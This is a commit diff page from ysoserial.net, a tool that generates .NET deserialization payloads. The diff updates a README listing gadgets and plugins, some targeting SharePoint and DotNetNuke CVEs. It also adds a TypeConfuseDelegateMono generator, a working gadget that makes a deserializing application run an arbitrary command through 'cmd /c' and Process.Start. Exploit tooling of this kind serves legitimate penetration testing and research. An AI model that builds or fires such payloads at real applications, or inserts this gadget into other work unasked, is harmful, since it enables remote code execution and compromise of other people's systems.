Skip to content

Commit bc778ce

Browse files
denandzdenandz
authored
Merge fb52cf8 into 9e03c52 
2 parents 9e03c52 + fb52cf8 commit bc778ce

File tree

3 files changed

+78
-5
lines changed

3 files changed

+78
-5
lines changed

README.md

Lines changed: 19 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -27,6 +27,13 @@ $ ./ysoserial -h
2727
ysoserial.net generates deserialization payloads for a variety of .NET formatters.
2828
2929
Available formatters:
30+
ActivitySurrogateDisableTypeCheck (ActivitySurrogateDisableTypeCheck Gadget by Nick Landers. Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
31+
Formatters:
32+
BinaryFormatter
33+
ObjectStateFormatter
34+
SoapFormatter
35+
NetDataContractSerializer
36+
LosFormatter
3037
ActivitySurrogateSelectorFromFile (ActivitySurrogateSelector gadget by James Forshaw. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
3138
Formatters:
3239
BinaryFormatter
@@ -48,7 +55,7 @@ Available formatters:
4855
XmlSerializer
4956
DataContractSerializer
5057
YamlDotNet < 5.0.0
51-
TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz.)
58+
TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz)
5259
Formatters:
5360
BinaryFormatter
5461
ObjectStateFormatter
@@ -68,23 +75,31 @@ Available formatters:
6875
ObjectStateFormatter
6976
NetDataContractSerializer
7077
LosFormatter
78+
TypeConfuseDelegateMono (TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono)
79+
Formatters:
80+
BinaryFormatter
81+
ObjectStateFormatter
82+
NetDataContractSerializer
83+
LosFormatter
7184
WindowsIdentity (WindowsIdentity Gadget by Levi Broderick)
7285
Formatters:
7386
BinaryFormatter
7487
Json.Net
7588
DataContractSerializer
89+
SoapFormatter
7690
7791
Available plugins:
78-
altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
92+
ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
93+
Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
7994
ApplicationTrust (Generates XML payload for the ApplicationTrust class)
8095
Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
8196
DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
8297
Resx (Generates RESX files)
8398
SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
84-
SharePoint (Generates poayloads for SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
99+
SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
85100
TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
86101
ViewState (Generates a ViewState using known MachineKey parameters)
87-
102+
88103
Usage: ysoserial.exe [options]
89104
Options:
90105
-p, --plugin=VALUE the plugin to be used

ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs

Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
using System;
2+
using System.Collections.Generic;
3+
using System.Diagnostics;
4+
using System.IO;
5+
using System.Reflection;
6+
7+
namespace ysoserial.Generators
8+
{
9+
class TypeConfuseDelegateMonoGenerator : GenericGenerator
10+
{
11+
public override string Name()
12+
{
13+
return "TypeConfuseDelegateMono";
14+
}
15+
16+
public override string Description()
17+
{
18+
return "TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono";
19+
}
20+
21+
public override List<string> SupportedFormatters()
22+
{
23+
return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" };
24+
}
25+
26+
public override object Generate(string cmd, string formatter, Boolean test)
27+
{
28+
return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test);
29+
}
30+
31+
/* this can be used easily by the plugins as well */
32+
public object TypeConfuseDelegateGadget(string cmd)
33+
{
34+
if (File.Exists(cmd))
35+
{
36+
Console.Error.WriteLine("Reading command from file " + cmd + " ...");
37+
cmd = File.ReadAllText(cmd);
38+
}
39+
Delegate da = new Comparison<string>(String.Compare);
40+
Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
41+
IComparer<string> comp = Comparer<string>.Create(d);
42+
SortedSet<string> set = new SortedSet<string>(comp);
43+
set.Add("cmd");
44+
set.Add("/c " + cmd);
45+
46+
FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
47+
object[] invoke_list = d.GetInvocationList();
48+
// Modify the invocation list to add Process::Start(string, string)
49+
invoke_list[0] = new Func<string, string, Process>(Process.Start);
50+
invoke_list[1] = new Func<string, string, Process>(Process.Start);
51+
fi.SetValue(d, invoke_list);
52+
53+
return set;
54+
}
55+
56+
}
57+
}

ysoserial/ysoserial.csproj

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -88,6 +88,7 @@
8888
<Compile Include="Generators\TextFormattingRunPropertiesGenerator.cs" />
8989
<Compile Include="Generators\PSObjectGenerator.cs" />
9090
<Compile Include="Generators\TypeConfuseDelegateGenerator.cs" />
91+
<Compile Include="Generators\TypeConfuseDelegateMonoGenerator.cs" />
9192
<Compile Include="Generators\WindowsIdentityGenerator.cs" />
9293
<Compile Include="Plugins\ActivatorUrlPlugin.cs" />
9394
<Compile Include="Plugins\AltserializationPlugin.cs" />
@@ -118,4 +119,4 @@
118119
<Target Name="AfterBuild">
119120
</Target>
120121
-->
121-
</Project>
122+
</Project>

0 commit comments

Comments
 (0)